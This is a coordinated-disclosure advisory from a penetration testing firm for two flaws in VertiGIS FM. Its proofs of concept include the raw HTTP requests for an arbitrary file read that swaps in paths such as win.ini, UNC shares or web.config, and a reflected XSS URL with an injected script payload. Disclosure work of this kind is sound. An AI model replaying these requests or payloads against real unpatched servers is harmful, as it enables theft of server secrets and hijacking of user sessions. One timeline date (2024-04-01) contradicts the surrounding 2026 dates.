During a recent engagement, Redguard’s security team conducted a penetration test against the GIS infrastructure of a customer. During this penetration test, an arbitrary file read due to a local file inclusion vulnerability was discovered in the multi-step file upload/download process of the VertiGIS FM application, a GIS solution for facility and infrastructure management developed by the vendor VertiGIS Ltd. The local file inclusion flaw, now assigned CVE-2026-0522, enables an authenticated attacker to read arbitrary files from the server. This vulnerability was rated with a high-severity CVSS base score of 7.4. Later, during the validation of the fix implemented by the vendor, an additional reflected cross-site scripting (XSS) vulnerability was identified in the dashboard search functionality. The reflected XSS vulnerability, assigned CVE-2026-3877, enables an attacker to craft a malicious URL that executes JavaScript in the context of any authenticated victim who visits it. This vulnerability was rated with a high-severity CVSS base score of 7.3. Concluding the initiated coordinated disclosure process, the vendor has released patches to address these issues.

Security Advisory for CVE-2026-0522

A local file inclusion vulnerability in the upload/download flow of the VertiGIS FM application allows authenticated attackers to read arbitrary files from the server by manipulating a file’s path during its upload. When the file is subsequently downloaded, the file in the attacker controlled path is returned. Due to the application’s ASP.NET architecture, this could potentially lead to remote code execution when the web.config file is obtained. Furthermore, the application resolves UNC paths which may enable NTLM-relaying attacks.

• Vulnerability Type: Arbitrary file read due to a local file inclusion in the upload/download functionality
• Attack Vector: Authenticated user with access to the upload/download functionality
• Affected Product: VertiGIS FM
• CVSS Score: 7.4 (High - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:P)
• CVE: CVE-2026-0522

Proof of Concept (PoC)

The upload process could be initiated by uploading a file using the functionality as shown below:

A file upload triggered the following request to store the actual file contents on the server:

1
2
3
4
5
6
POST /bfusr/invoke/GeoMan.Common.Web.UserControls.GeoManDBDocumentsFeatureControl,GeoMan.Common.Web/AjaxDocUpload?qqfile=smudge.jpg&_DATA=%5B%7B%22uploadContext%22%3A%221b06d797-4f37-4627-8e16-59a86bb227b0%22%7D%5D&controlmode=undefined HTTP/1.1
Host: [REDACTED]
Cookie: [...]
Content-Type: image/jpeg

[FILE CONTENT]

The server then returned the file path for the temporary file on the server’s file system:

1
2
3
4
5
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 118

{"success":true,"tempPath":"C:\\Windows\\TEMP\\GeoManUpload\\VertiGISFM_worker\\bme5rozq.r5d.jpg","fileName":"smudge"}

During the file upload, multiple requests were exchanged between the client and the server. However, only the final request, where the uploaded file is linked to an internal ID, is relevant for this vulnerability. This request was initiated through a click on save in the user interface:

Shown below is the corresponding request triggered by the client when the button was pressed:

1
2
3
4
5
6
POST //GeoManEdit.aspx?WindowMode=Frame&OPath=78%40100021&WorkflowEntity=dotNetBF.Modules.Org.Person&WorkflowType=Add&WorkflowName=AddDocuments&RedirectUrl=[REDACTED] HTTP/1.1
Host: [REDACTED]
Cookie: [...]
Content-Type: application/x-www-form-urlencoded

Cmd=EDIT&__EVENTTARGET=toolbar&__EVENTARGUMENT=APPLY&__DISPLAYSTATI=&__VIEWSTATE=[...]&__VIEWSTATEGENERATOR=[...]&moduleName=&__SCROLLPOS=0&EditControl%24frmGui%24form%24ctl00%24ctl00%24else%24ctl00%24else%24ctl00%24else%24ctl00%24ctl00%24ctl00%24ctl01%24wasVisible=True&EditControl%24frmGui%24form%24ctl00%24ctl00%24else%24ctl00%24else%24ctl00%24else%24ctl00%24ctl00%24ctl00%24ctl03%24wasVisible=True&EditControl%24frmGui%24form%24ctl00%24ctl00%24else%24ctl00%24else%24ctl00%24else%24ctl00%24ctl00%24ctl00%24ctl05%24wasVisible=True&EditControl%24frmGui%24form%24ctl00%24ctl00%24else%24ctl00%24else%24ctl00%24else%24ctl00%24ctl00%24ctl01%24ctl01%24wasVisible=True&EditControl%24frmGui%24form%24ctl00%24ctl00%24else%24ctl00%24else%24ctl00%24else%24ctl00%24ctl00%24ctl01%24ctl03%24wasVisible=True&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24wasVisible=True&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24changes=ADD%0D%0AA%401003A5%0D%0A03.09.2025%0D%0A0%0D%0Asmudge%0D%0Asmudge.jpg%0D%0AC%3A%5CWindows%5CTEMP%5CGeoManUpload%5CVertiGISFM_worker%5Cbme5rozq.r5d.jpg%0D%0A0&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24removed=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl01%24wasVisible=True&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl01%24_ctlType%24txt=Sonstiges+Dokument&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl01%24_ctlType%24val=A%401003A5&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl03%24wasVisible=True&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl03%24_ctlDocDate%24val=26.08.2025&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl05%24wasVisible=True&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24gflAdd0%24form%24ctl05%24_ctlName=rce&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24AddIndexCollection=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24AddDeletedIndexCollection=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24AddState=1&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24CurrentColumnFilters=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24ParentStates=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl02%24State=1&file=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl21%24txt=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl21%24val=&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl24%24txt=100%25&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl24%24val=1&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl29%24txt=Wie+Kamera&EditControl%24frmGui%24form%24ctl01%24when0%24ctl00%24ctl01%24_ctlDocuments%24ctl29%24val=none&EditControl%24frmGui%24form%24ctl03%24ctl00=0&EditControl%24frmGui%24form%24ctl03%24ctl02%24wasVisible=True&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24AddIndexCollection=&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24AddDeletedIndexCollection=&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24AddState=0&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24CurrentColumnFilters=&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24ParentStates=&EditControl%24frmGui%24form%24ctl03%24ctl02%24_ctlDocumentRefObjects%24State=0

The request body contained the following data which was URL decoded for readability:

1
2
3
4
5
6
7
8
EditControl$frmGui$form$ctl01$when0$ctl00$ctl01$_ctlDocuments$changes=ADD
A@1003A5
03.09.2025
0
smudge
smudge.jpg
C:\Windows\TEMP\GeoManUpload\VertiGISFM_worker\bme5rozq.r5d.jpg
0

This request could be replayed with an arbitrary file path such as C:\Windows\win.ini. When the file was subsequently downloaded through the web user interface, the file contents showed that the win.ini file was returned instead of the originally uploaded file.

Impact

The file upload process can therefore be abused to read arbitrary files from the server given the process has the necessary access rights. The specified file path is however not limited to local files stored on the web server, as UNC paths are also accepted. Attackers exploiting this vulnerability would thus be able access local files as well as files on network shares as long as the file paths are known and the process has the access to. Being in a suitable network position, attackers could also perform NTLM-relaying attacks to capture or a relay the process’ user credentials.

For ASP.NET applications, the web.config file contains cryptographic secrets used to sign and encrypt the ViewState. If those secrets are known it is often possible to generate malicious payloads, which when received by the server, lead to remote code execution through deserialization of ViewState objects. Due to time constraints in this penetration test, this could not be technically verified but is assumed to be feasible by the security testers.

Enabled stack traces or error messages can additionally support such an attack since local file inclusions require the prior knowledge of server-side file paths.

Security Advisory for CVE-2026-3877

A reflected cross-site scripting (XSS) vulnerability in the dashboard search functionality of the VertiGIS FM solution allows attackers to craft a malicious URL, that if visited by an authenticated victim, will execute arbitrary JavaScript in the victim’s context. Such a URL could be delivered through various means, for instance, by sending a link or by tricking victims to visit a page crafted by the attacker.

• Vulnerability Type: Reflected cross-site scripting (XSS) via a specially-crafted URL
• Attack Vector: A user crafts a malicious URL that is subsequently opened by a victim
• Affected Product: VertiGIS FM
• CVSS Score: 7.3 (HIGH - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)
• CVE: CVE-2026-3877

Proof of Concept (PoC)

VertiGIS FM provides the /demo/1/fm/DashboardSearch.aspx endpoint. Parts of the URL are reflected in a HTML script tag without proper output encoding, allowing for the injection of attacker controlled JavaScript instructions. The URL was used to demonstrate this flaw:

1
https://fm.vertigis.com/demo/1/fm/DashboardSearch.aspx?type=GeoMan.Devices.ObjOrderSearchList,GeoMan.Common.Core&ModuleInfo=GeoMan.Device67213#'}};alert(window.location);/*

When this URL is visited by an authenticated user, the alert is shown in the user’s web browser:

Impact

Exploiting this vulnerability allows an attacker to execute arbitrary JavaScript in the victim’s browser and perform unauthorized actions on their behalf. If the compromised account holds the necessary privileges, the attacker can also view and edit stored data.

It should be noted that the XSS is only exploitable if the victim is already authenticated within the application.

Affected versions

The local file inclusion vulnerability was identified in VertiGIS FM in version 10.5.00119 (0d29d428), while the XSS was found in a test environment. According to the vendor, versions prior to 10.11.363 are vulnerable to the local file inclusion while versions prior to 10.13.403 are vulnerable to the reflected XSS.

Suggested Mitigations and Countermeasures

The vendor has addressed these vulnerabilities in version 10.11.363 (local file inclusion) and 10.13.403 (reflected XSS), which Redguard’s security testers have confirmed as a successful mitigation. It is therefore recommended to upgrade to version 10.13.403 or greater. As an additional defense-in-depth measure, Redguard recommends to configure restrictions on process permissions and access to the file system, as well as network restrictions that make the application accessible only within a given scope. In addition, firewall rules can be used to allow only strictly necessary connections to other servers.

Credits

• Benjamin Faller, Redguard AG
• David Wischnjak, Redguard AG
• Andreas Pfefferle, Redguard AG

Timeline

The following timeline details all the steps taken in the coordinated vulnerability disclosure process. The customer refers to the company that tasked Redguard with a penetration test of VertiGIS FM and the vendor refers to the VertiGIS team:

• 2025-09-19: Redguard reported the local file inclusion vulnerability to the customer.
• 2025-09-26: Customer agrees to perform the CVD.
• 2025-11-13: Redguard notified the vendor of the vulnerability and CVD.
• 2025-11-14: Redguard shared the technical details with the vendor.
• 2025-11-21: Vendor asked Redguard for a meeting to discuss the public disclosure of the vulnerability.
• 2025-11-27: Alignment meeting between Redguard and the vendor. Redguard answered the vendor’s questions on CVD procedures, confirmed advisory publication, and committed to retesting the fix upon deployment.
• 2025-12-03: Access to a deployment for the retest was granted to Redguard.
• 2025-12-16: Redguard shared the retest results, confirmed the initial fix was successful, but reported a temporary path was still exposed, and contacted NCSC for a CVE-ID. Redguard also shared technical details about a new, potentially exploitable reflected XSS vulnerability to the vendor. Redguard offered to verify practical exploitability of the XSS vulnerability if access to the test environment can be reactivated.
• 2025-12-21 to 2026-01-26: Communication regarding test environment access logistics.
• 2026-01-15: Redguard followed up on the current patch release status and informed the vendor that CVE-2026-0522 was reserved for the file inclusion vulnerability.
• 2026-01-26: Vendor confirmed that hosted customers were updated and all others were informed via the support portal to patch their systems.
• 2026-01-30: Redguard asked for the vulnerable and patched version numbers.
• 2026-02-01: Vendor communicated the patched version number for the local file inclusion vulnerability.
• 2026-02-03 to 2026-02-04: Redguard was able to verify and confirm to the vendor that the XSS is exploitable and that a CVE would be assigned. Redguard also asked for information whether this vulnerability was already patched based on the information provided in December and asked whether the disclosure of both vulnerabilities should continue separately.
• 2026-02-16: Redguard asks for a status update.
• 2026-02-27: Redguard asks for a status update and sets a new deadline for publication should no further feedback be received.
• 2026-03-09: Vendor confirmed the fix for CVE-2026-0522 was complete and requested technical details for the XSS exploitation.
• 2026-03-10: Redguard provided the updated draft advisory including the XSS details. CVE-2026-3877 was reserved by the NCSC for the XSS vulnerability. The vendor informs about the planned release date 2026-03-18.
• 2026-03-12: Redguard sets the final publication date to 2024-04-01.
• 2026-03-20: Vendor provides the patched and released version number for the XSS.
• 2026-03-25: Redguard shares the final vulnerability details with the NCSC.
• 2026-03-26: Redguard informed the vendor that CVE-2026-3877 was reserved and everything is set for publication
• 2026-04-01: Publication of this advisory

Disclaimer

This advisory is not an exhaustive list of all potential security issues for the mentioned software. Other vulnerabilities may exist. The information provided is believed to be accurate at the time of publishing. Use of this information is at your own risk. Neither the author nor the publisher accepts any liability for any loss or damage arising from the use of, or reliance on, this information.